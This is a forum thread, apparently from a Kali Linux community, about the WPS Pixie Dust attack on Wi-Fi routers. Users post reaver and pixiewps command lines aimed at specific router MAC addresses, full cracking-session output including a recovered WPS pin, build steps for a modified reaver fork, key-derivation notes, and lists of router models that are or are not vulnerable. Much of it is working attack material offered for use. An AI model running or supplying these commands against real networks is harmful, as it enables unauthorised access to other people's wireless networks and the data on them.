WPS Pixie Dust Attack (Offline WPS Attack)

[nuroo]

@MTeams

Your internal reaver mod version feeds info into pixiewps automatically? (no more cut and paste?)

If pixie attack works > key........if fail bruteforce 11,000 pins?

Will release when -pkr added?

[t6_x]

https://forums.kali.org/showthread.p...ie-Dust-Attack

[nuroo]

Here is my contribution

Reaver modified to make the pixiewps when testing a pin


GitHub - Here

https://github.com/t6x/reaver-wps-fork-t6x

Thanks t6, just tested it.

Code:

reaver -i mon0 -b 40:70:09:DC:81:F0 -vv -S -K1

Code:

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>

[+] Waiting for beacon from 40:**:**:**:BA:60
[+] Switching mon0 to channel 1
[+] Associated with 40:**:**:**:BA:60 (ESSID: TG1672G62)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: f2:f4:15:6c:59:39:dc:06:18:e9:c9:4f:e0:f3:8a:ad
[P] PKE: dc:1e:5a:f6:6c:b8:98:9f:de:77:66:4e:41:fb:e7:11:b7:02:b7:7c:59:52:11:81:19:32:f0:f7:51:4e:27:8e:57:9a:de:10:f7:b8:5b:1e:fd:aa:6e:06:9e:e1:f1:96:e5:5a:c7:6f:e8:41:f5:ae:4b:11:53:65:59:6f:48:11:07:4c:93:80:c3:bb:ee:9a:e8:af:50:f6:58:fd:97:52:37:30:e9:5b:8a:74:41:54:17:da:7e:ea:5a:8a:9e:bc:f7:40:7e:8d:65:29:f2:6b:21:ee:27:ae:c3:60:42:db:2c:75:2d:72:5e:33:79:7c:3a:5e:55:90:69:a9:2b:92:4d:2f:9a:14:13:1c:f0:f8:92:c6:77:04:eb:03:9c:e6:1f:7b:ea:8b:2b:5e:18:9f:99:49:38:e3:9a:4b:60:09:41:94:83:51:47:1d:b7:d5:1b:4c:51:7a:92:be:77:da:b5:eb:a3:86:7a:dc:84:b9:99:fe:02:2c:5c:44:36:a3
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: c3:ee:01:ef:f3:63:86:49:7e:24:13:54:d1:f0:0d:ff:57:77:12:65:38:34:6f:10:4a:c8:14:95:57:6c:0e:2f
[+] Sending M2 message
[P] E-Hash1: 41:73:b9:eb:ea:74:0f:b1:fd:1a:d1:93:0f:df:37:8e:d7:fe:6c:ee:c2:ec:0f:0d:60:ac:91:4d:04:60:03:ee
[P] E-Hash2: f7:42:2b:e7:13:6f:d0:00:d8:05:72:7d:b6:71:29:c4:10:1f:2f:01:0b:38:b2:9e:7d:99:3f:a7:86:d5:93:85
[Pixie-Dust]  
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: d5:84:7c:94:bb:1c:3e:45:a5:3f:60:b4:a1:2b:a4:9b
[Pixie-Dust]   [*] PSK2: 45:68:18:4b:9b:28:45:c9:2a:c8:78:c3:b8:a9:b6:92
[Pixie-Dust]   [+] WPS pin: 60919014
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]  
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

+1 for adding pkr to reaver output
Awesome!!

[nuroo]

In example above reaver/pixie found pin. Nice.
But it kept going. Continuing to try pins.

Shouldnt it check the found pixie pin, to get the passphrase and then end?

[soxrok2212]

Thanks to Wiire and Espresso_Boy, the new modified reaver now prints the PKr for Realtek devices! http://www.mediafire.com/download/or4jj8m8jfek5b4

[t6_x]

In example above reaver/pixie found pin. Nice.
But it kept going. Continuing to try pins.

Shouldnt it check the found pixie pin, to get the passphrase and then end?

Yes, it is possible

I'll make adjustments, for he did not continue with the test after running the pixie

I will add an option to get the passphrase and close.

Thanks for the tests and the contribution.

Soon I commit

[bigfoot]

root@kali:~# reaver -i mon0 -b 00:8E:F2:65:C4:74 -vv

Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[?] Restore previous session for 00:8E:F2:65:C4:74? [n/Y] n
[+] Waiting for beacon from 00:8E:F2:65:C4:74
[+] Switching mon0 to channel 12
[+] Associated with 00:8E:F2:65:C4:74 (ESSID: virginmedia6972489)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 85:a2:64:d7:01:eb:1c:3f:9e:57:18:1e:8c:8d:cd:ec
[P] PKE: 65:af:14:9c:e5:9b:2a:46:5f:a3:c4:e8:8e:ff:70:c4:35 :10:ab:8f:a0:ef:a5:53:d8:14:ee:87:e7:ea:20:b4:27:f 5:9d:b3:77:0f:c0:0b:3d:82:d7:c6:2d:65:84:62:bb:de: dc:9a:9e:f5:a2:6a:8d:94:f4:d2:28:6c:64:80:9c:b3:06 :fe:b5:4f:a0:8b:8d:12:54:97:16:0c:98:87:b4:52:0f:b 4:53:39:b8:72:f8:08:cd:9f:1e:4e:b9:d4:c5:7b:77:69: 84:17:e8:72:81:9c:b0:a7:af:86:92:6c:2f:38:03:7e:d9 :2a:16:31:51:b3:22:22:ed:6b:4c:76:f7:cf:a5:4e:68:9 7:5c:fc:16:2a:a7:13:0e:0d:c2:93:31:3f:08:a3:51:cb: 5c:68:b4:08:b5:90:89:c7:3c:a8:ef:20:dc:4d:b5:54:dc :03:d0:a2:80:ad:35:57:7a:e4:50:1c:a8:6a:eb:f2:d9:8 8:a0:7c:b3:a7:a8:8f:c7:26
[P] WPS Manufacturer: Netgear
[P] WPS Model Number: 123456
[+] Received M1 message
[P] PKR: b8:d9:19:ba:d9:af:20:61:11:4c:7b:6b:03:97:ce:fc:59 :bd:c5:f0:e0:d9:c8:ab:13:10:8e:ef:11:ff:b9:91:2a:6 a:7e:d9:61:6b:61:04:5b:56:ed:8e:d3:38:3a:94:bf:57: 5c:1b:2c:d0:1a:39:ec:53:26:43:62:8d:fc:62:bb:64:0b :b6:ed:4d:96:8d:8d:67:b9:a2:68:21:a5:de:6d:e1:65:2 d:7b:bd:25:95:26:f0:2d:ef:2d:9b:30:57:59:e0:5f:b9: b8:92:7a:03:16:84:3a:c0:cd:ee:56:d9:6f:ba:48:65:7d :9b:cf:72:d0:24:1a:96:c5:db:29:67:cc:4c:d2:58:0c:f 5:75:5c:04:d8:a0:25:05:5e:7a:c9:e9:0f:aa:7f:fc:cf: 42:58:d7:d0:5b:ba:d0:84:c1:f4:62:53:af:02:57:54:8c :f4:7f:26:4b:ca:b2:01:a9:16:f5:7b:38:53:76:c8:a9:9 a:04:6f:be:05:40:87:ac:3e
[P] AuthKey: de:7d:cd:3d:d7:1c:90:ef:7c:bb:f8:01:90:6e:14:08:4a :77:4b:33:88:7b:41:05:85:a7:46:74:14:72:00:ae
[+] Sending M2 message
[P] E-Hash1: db:b9:20:c2:cf:a1:53:55:f2:d0:1a:79:ce:4c:f5:ba:7c :4f:dd:4d:f4:b3:35:ef:86:a3:93:47:00:c1:05:0b
[P] E-Hash2: 97:f5:e9:a1:4e:cd:bf:8f:76:dd:8c:87:1a:30:24:76:8e :0c:56:c1:11:4e:77:89:33:45:c9:f6:66:b9:05:dc


Working well now to see if it will find the pin, other attempts before said no.

[bigfoot]

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 7C:4C:A53:84:45
[+] Associated with 7C:4C:A53:84:45 (ESSID: SKYA2FF7)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 04:57:06:96:9a:79:ba:40:c4:98:bb:bd:8f:44:82:84
[P] PKE: 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6 :3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2 f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9: 40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3 :25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:8 5:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29: 81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75 :51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:9 8:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18: b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b :f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:8 8:03:a5:a7:a1:0f:a9:6f:37
[P] WPS Manufacturer: Broadcom
[P] WPS Model Number: 123456
[+] Received M1 message
[P] PKR: f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9 :e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:4 8:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e: ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46 :d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:7 2:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e: b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d :85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d 0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d: bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be :c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9 e:59:92:16:a4:06:d1:c0:cb
[P] AuthKey: 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa :ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef
[+] Sending M2 message
[P] E-Hash1: 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32 :c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f
[P] E-Hash2: b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81 :d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a


root@kali:~# pixiewps -e 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6 :3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2 f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9: 40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3 :25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:8 5:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29: 81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75 :51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:9 8:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18: b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b :f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:8 8:03:a5:a7:a1:0f:a9:6f:37 -r f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9 :e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:4 8:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e: ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46 :d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:7 2:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e: b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d :85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d 0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d: bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be :c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9 e:59:92:16:a4:06:d1:c0:cb -s 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32 :c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f -z b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81 :d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a -a 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa :ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef

[-] WPS pin not found!
[*] Time taken: 0 s

[nuroo]

@soxrok2212

Reaver reports:
Manufacturer: MTT
Model Number: 123456

Wireshark reports:
Manufacturer: MTT
Model Name: MWG3401N

Brand name possibly Zoom? Cant find any info on chipset used



Pixiewps attack fails, however 1st try pin '12345670' gives passphrare!! Wow

[soxrok2212]

Probably a really old AP that the manufacturer never fixed.

[someone_else]

Vulnerable:

WPS Manufacturer: D-Link
WPS Model Number: DIR-615H1
CHiP: Ralink RT3352
E-Nonce: 60:d5:32:46:7f:2c:31:a8:e6:0b:db:5a:5e:06:ce:f8
PKE:ac:21:5b:eb:8d:70:ac:53:81:c7:4d:aa:fc:88:90:3 d:8f:c7:5d:e8:fa:b1:d3:0f:d6:81:bf:d7:a1:0d:23:62: d3:07:77:d6:76:7b:5c:cc:18:f2:13:f3:1f:d2:64:86:87 :67:74:cf:38:db:e4:32:86:92:65:05:9a:8d:a3:eb:79:2 7:60:e6:13:74:d2:3b:92:42:37:e3:bb:3d:29:db:ff:78: 49:27:18:10:ef:bd:a4:ce:57:40:aa:7e:2d:bf:21:51:9f :91:f0:df:e3:d2:89:b5:9f:c1:b6:1c:5c:1e:d9:e3:73:d 4:38:3b:75:2e:e1:c2:63:55:a3:4d:e9:fe:c3:1f:e4:4d: ac:69:fe:9c:d3:37:7a:df:36:89:a3:61:00:92:d2:94:2e :b2:fd:82:84:b8:08:d3:64:ea:28:cd:26:5e:d6:62:a0:8 e:e5:df:f6:5f:2c:0d:28:c8:b6:48:c7:91:d2:e5:b7:d6: bd:c1:f4:7a:e6:be:e1:37:0b:96
AuthKey: 93:94:ad:9a:fd:e1:e4:bc:6e:9b:77:ec:a8:52:de:cb:33 :3f:11:6d:d8:66:b2:d3:01:25:27:b9:9c:1f:91:ed
E-Hash1: 86:31:65:59:bc:4c:4f:6c:55:53:6c:bd:24:82:11:4c:35 :4b:16:ed:b4:f9:b5:d5:b7:6a:d0:7f:be:bd:68:b8
E-Hash2: 4b:f6:32:c3:55:2e:0b:e4:41:68:7b:03:10:74:2b:59:44 :6a:ee:27:d2:93:ca:d0:1a:cb:a1:da:2a:95:c6:9d

NOT VULNERABLE:

Modell: WNR1000v3 - Netgear
Chip:Broadcom BCM5356A1

E-Nonce: 5a:bc:44:d6:c7:96:9f:12:4e:e2:0a:c3:b6:b2:cd:53
PKE:e5:4d:f8:60:b2:0c:a4:1e:94:55:46:bf:b5:e6:ba:7 2:0b:52:b5:37:ef:d9:e3:cd:a9:cd:e6:16:c6:b6:d9:d4: 41:47:05:59:aa:3c:b9:e0:2d:89:4b:d1:bd:97:a1:23:a4 :b7:98:48:2b:6e:dd:a1:b2:0c:28:d1:2c:a5:1c:6a:c7:2 6:e2:4d:18:f0:28:2d:1b:35:85:a0:01:1d:2f:1c:09:f6: b0:03:ee:c6:86:ff:dd:8d:84:f1:22:1d:de:2a:ff:9e:b3 :70:95:09:75:85:4a:1a:8a:41:57:7b:8e:e2:60:79:4f:9 1:cc:a2:55:12:73:a5:6c:e3:c5:08:fc:81:9a:1f:18:48: 25:69:f6:d6:6e:d2:1b:c3:d2:7b:87:c1:ee:ab:e6:e3:48 :eb:ed:8c:4f:1a:d1:60:27:b7:88:ed:96:5c:47:5f:b5:a 4:d3:78:0b:20:f7:5b:1e:cf:c0:a0:03:e4:49:f1:57:df: f9:b9:42:85:a0:51:dd:bc:cf:bd
PKR:d8:8d:2f:fe:ca:6a:e6:db:c8:ac:7d:9c:5c:f8:36:6 b:7c:40:d2:56:91:0c:5d:d8:e4:f1:a8:2b:7f:c1:10:98: bf:a2:e3:df:02:a3:86:bb:be:10:a7:00:62:43:41:74:db :15:40:b5:18:42:de:92:e3:15:02:40:63:f2:fa:43:3d:e d:8c:78:e5:bf:40:37:1f:72:78:3a:73:c8:1f:93:9c:13: 18:a4:22:a6:8f:66:7d:c2:43:12:94:6f:92:a4:42:19:b2 :0d:21:b4:23:7b:75:75:f2:99:13:d4:09:76:fb:a7:23:9 3:1b:82:93:91:f6:cf:92:af:15:36:3c:a5:c4:5e:65:95: 10:52:54:dc:74:7b:b9:74:2d:fa:9e:6f:fb:c9:e6:87:a7 :ee:47:31:dc:ae:93:ba:6d:15:13:c9:51:7f:de:8f:f7:c 7:c3:09:86:3d:6b:cd:5e:3a:7d:a7:af:fb:39:82:10:12: 0c:1c:23:f7:16:6b:fe:6c:86:fc
AuthKey: 5a:bf:8b:43:be:0d:e2:12:0d:48:a5:a4:95:7a:e5:31:1d :6a:75:0e:49:7e:6e:fd:18:07:96:c3:7d:21:f8:1e
E-Hash1: 2a:1f:0d:4e:de:29:61:01:a0:86:45:be:34:71:ae:15:3c :58:21:e1:34:77:9b:f7:89:ed:48:07:b8:ee:9e:ac
E-Hash2: 44:31:63:0f:9c:5e:e7:5b:bb:a7:1b:c2:b7:14:35:93:16 :fe:e7:0e:0e:33:85:c3:08:9f:24:a6:8c:dd:68:c7

btw @soxrok2212: i forgot two digits in the hitron-no. correct is cve30360, not cve360]
@all:
is there any way, to calculate the auth-key from an existing .pcap with some bash/shell-code ? i like to extract the necessary info with tshark from capture-file (for PKR : tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the auth-key with some bash-script.
thanks & i forgot at my first post : great work !

[t6_x]

In example above reaver/pixie found pin. Nice.
But it kept going. Continuing to try pins.

Shouldnt it check the found pixie pin, to get the passphrase and then end?

I gave commit in a new version on github, but I could not get into the forum to post

Whenever you need to make modifications and further improvements just stay tuned on github.

This week I will post a new tool





Apparently someone was attacking this my account to stop me from logging in this forum, I do not know what the reason for this, I tried to create another account, but also began to be attacked also

I told the admin and they are already looking for the User responsible for this (Someone behind this proxy (167.114.0.xxx) )

[nuroo]

I gave commit in a new version on github, but I could not get into the forum to post

Whenever you need to make modifications and further improvements just stay tuned on github.

This week I will post a new tool





Apparently someone was attacking this my account to stop me from logging in this forum, I do not know what the reason for this, I tried to create another account, but also began to be attacked also

I told the admin and they are already looking for the User responsible for this (Someone behind this proxy (167.114.0.xxx) )

wow t6, someone is a hater. Sry to hear you where being blocked. Wish I saw this post last night, I'm anxious to try new version reaver, but time for work. I will try it lunch time and report but. Excellent work !

[soxrok2212]

[B]
@all:
is there any way, to calculate the auth-key from an existing .pcap with some bash/shell-code ? i like to extract the necessary info with tshark from capture-file (for PKR : tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the auth-key with some bash-script.
thanks & i forgot at my first post : great work !

Yeah its pretty simple but we haven't done it yet :P The drawback is you need to use small DH Keys in reaver to do it manually... and small DH keys don't work for Realtek:P Anyways, all you have to do is make the KDK, or Key Derivation Key:

Code:

KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)

And then this gives you the AuthKey, KeyWrapKey and the EMSK:

Code:

kdf(key, personalization_string, total_key_bits) : result := “”
iterations = (total_key_bits + prf_digest_size – 1)/prf_digest_size for i = 1 to iterations do
result := result || prf(key, i || personalization_string || total_key_bits) return 1st total_key_bits of result and destroy any bits left over

I'm not a coder so I can't do it but I'm sure someone else can.

[nuroo]

Belkin International
F9K1002

wikidevi 5 versions, different chipsets.

pixiewps attack failed though, didnt catch version number with wireshack however

[simo1]

Hi. thanks for this great information. Keep it up :-) . I tried to do it with pixiewps master but I didn't find the prk key and I added the -S but it didn't work. so, I tried the Pixiescript v2.1 and I got this : thanks

REAVER TRABAJANDO CON BSSID 18:17:25:2B:E3:50, ESSID TNCAP2BE350 ESPERA 50 s ...
EXTRAYENDO DATOS ...
PKr : 00814f6ea4c9ab9d5d80106f6b8e314768ae728b4214c4698a 02eb9320f41e53f1054e6e137f64b64fec379fed2ce57c04af 39e51ff450908c74df7e6d7df0ec1430dca9841ec83b2e318c 78d8835a8b03c6321af1a168cd2a6383fa6458cce341a45e85 fbad444291e255d1c3204c12df3c8373061b6183f55c8ff458 f68f433334c1c0424fd95756efff233d8087a1d92aa64e92bb 3470ac1625c5308dc1af5839e58a42f35336e3f74a4b18806c f6cc6f054a9700fee1d8a507ce413dc07a
PKe : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b
EHASH1 : 316321fbd0c01cd758a89284fdc4c40bcbbe8f4be95a9d8f2b 22c6504a8d4e70
EHASH2 : c680832b3a6e8afc47ef64147757cfb5d66ad977ea4cfc1dd6 d004563e1f2629
AuthKey: 89299deee5f7a96ff56751a1628d9b9fdcad677af68ceb015d 5249bd7aac13ad
Enrollee Nonce: 6e6e281312d0aa2679a8909435fd7d6f

DATOS AP
========
BSSID: : 18:17:25:2B:E3:50
ESSID: : TNCAP2BE350
Fabricante : Technicolor
Nombre del dispositivo : Router
Version OS : 268435456
Modelo : Technicolor TD5
Numero de modelo : Technicolor TD5

PROBANDO CON PIXIEWPS 1.0 by wiire

[-] WPS pin not found!
[*] Time taken: 1 s

[SubZero5]

I tried the Pixiescript v2.1 and ...

Pixiescript v2.4 is out.

[DeEqualsDos]

If you have the wps pin already through another method
how can you find out the pass-phrase ?

[saturn95]

Really interested but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
It needs reaver and what must I do to install?
Thank you

[nuroo]

Really interested but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
It needs reaver and what must I do to install?
Thank you

Build Reaver

cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install <<<----- will remove old version

[saturn95]

Build Reaver

cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install <<<----- will remove old version

Thank you for responding

I am now trying to figure how to use Wireshark to find M1 and M2 data.

Thank you

[Saydamination]

Great!

Vulnerable ralink chipsets ...
İnvulnerable realtek chipsets.

Example... RTL8671 EV 2006-27-07 realtek chipsets are invulnerable...


some modems using modem serial number for wps pin..

Example . Air -rities modems...

[aanarchyy]

Use the wireshark filter "eapol.type == 0" and they are much easier to find.

[nuroo]

Use the wireshark filter "eapol.type == 0" and they are much easier to find.

Is that a display filter correct?
Is there a similar capture filter so file size not so big?

[nuroo]

Googled my own question.
Display filter for Ethernet type EAPOL.
"eapol.type == 0" or just "eapol"

Capture filter for Ethernet type EAPOL - only saves eapols to hard drive during a capture session, much smaller file size.
"ether proto 0x888e"

enter without quotes.

[unsuns06]

Hello Everyone !

I want first to congratulate you about the great steps you did through this Pixie Dust Exploit.

Also, I have noticed that today, on the WPS Pixie Dust Database , the router Technicolor TD5130 is being said as Vulnerable.

However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".

So I want to know who could perform this exploit, and how (with full description if possible) ?

There is also a TD5130 v3 that I'd love to test it on and share with you all.

Thank You !

[t6_x]

It would be interesting you put the output of reaver.

So we can see what chipset is and other information

[Extradry]

Hi All

A couple more for the database

Technicolor TG-797N v3 Not Vulneruable

Code:

   

XX:XX:XX:XX:XX:XX| 6|-70|1.0|No |Telstra9F72A5| Technicolor| 797n v3

OUI: 00-10-18 (Broadcom)

[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 41:59:b6:83:3c:ce:53:58:e8:55:5d:b2:2c:b2:87:e7
[P] PKE: 1c:8d:16:a1:5f:08:c2:f0:07:67:b3:24:c9:26:73:c2:ff:b5:c0:3b:39:96:fd:38:b1:d6:de:b7:81:15:63:cb:43:af:f8:21:4f:1d:47:3b:d8:71:e8:17:f6:49:f6:00:31:1c:95:ed:df:76:77:63:48:2b:82:95:e2:b0:bc:c4:41:2c:b5:2b:95:a6:3d:65:3f:3b:11:5d:81:92:2a:9b:65:a2:61:86:39:c7:d0:e0:3d:4c:c9:84:5c:78:b7:87:57:e9:9f:b1:46:97:ca:e0:b6:d2:c7:30:97:7c:a6:36:d6:97:39:fc:93:be:b8:c6:dd:d6:cb:59:b3:b5:e5:0a:94:0b:4a:0c:a8:15:ae:8d:95:dc:f0:95:63:5d:57:2d:34:d6:1d:b9:9e:3e:77:d5:be:c1:1f:a3:3d:55:b8:2b:6d:02:60:a0:a6:44:89:78:e4:a8:a4:56:f8:ee:5b:cb:5f:97:2e:62:a3:0d:21:e3:6a:75:ef:40:d0:db:39:4f
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: 797n v3
[P] WPS Model Serial Number: 1426SARZR
[+] Received M1 message
[P] PKR: 1d:4d:69:d6:76:ac:8d:6f:9e:d7:7a:3a:4a:0b:d7:38:91:fe:e4:76:99:dc:de:95:70:0f:76:8e:cf:f0:ae:9d:61:21:2e:9e:a2:49:a6:38:ce:84:bf:8c:24:d1:6e:67:27:9c:8c:5f:14:0b:80:f2:52:aa:81:ed:f9:b7:c4:93:4e:fb:c7:6c:fd:16:5d:81:d8:5d:73:c2:72:1f:9d:54:3d:a0:33:cc:83:61:e1:22:9c:4a:8d:61:d1:19:87:78:7c:ea:0e:83:1f:33:bc:a4:07:e2:a0:0a:ad:69:6b:e8:13:ca:6f:0d:d6:c5:6c:0f:0d:03:b2:4b:7c:77:22:30:c6:60:70:2d:9a:c6:fb:dc:fc:ac:6a:83:60:a0:78:e2:65:c1:53:e7:d3:c6:0c:14:75:98:83:ec:c4:6b:ff:ad:c3:4f:bc:87:d4:27:d5:6c:6d:77:d0:c6:9f:10:1d:46:54:94:6a:9e:8a:47:f0:2a:f9:e3:49:e0:93:a3:cf:99
[P] AuthKey: e0:9a:70:98:e9:02:e6:35:de:9f:51:76:8a:bb:79:5d:c2:7e:86:55:bf:bb:ad:d6:c1:59:f6:72:ea:e1:eb:66
[+] Sending M2 message
[P] E-Hash1: d5:ae:2b:a4:98:12:42:08:3a:0e:7a:a2:20:b0:38:c2:92:cc:d2:89:e1:e5:d2:06:26:78:94:bd:7d:d2:70:8a
[P] E-Hash2: f5:92:52:dc:5a:67:0a:d6:c7:b4:86:b6:7b:72:19:c9:42:f7:6f:47:cc:38:5b:3c:b5:25:74:1a:43:99:75:0c
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]

TP-LINK TD-W8960N Not Vulneruable

Code:

 XX:XX:XX:XX:XX:XX|11|-51|1.0|No |TP-LINK_48FD412| TP-LINK| 12345690

OUI: 00-10-18 (Broadcom)

Device Name: TD-W8960N


[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5a:07:59:bb:b9:6a:14:bf:3a:ed:0b:50:5b:2d:8d:d2
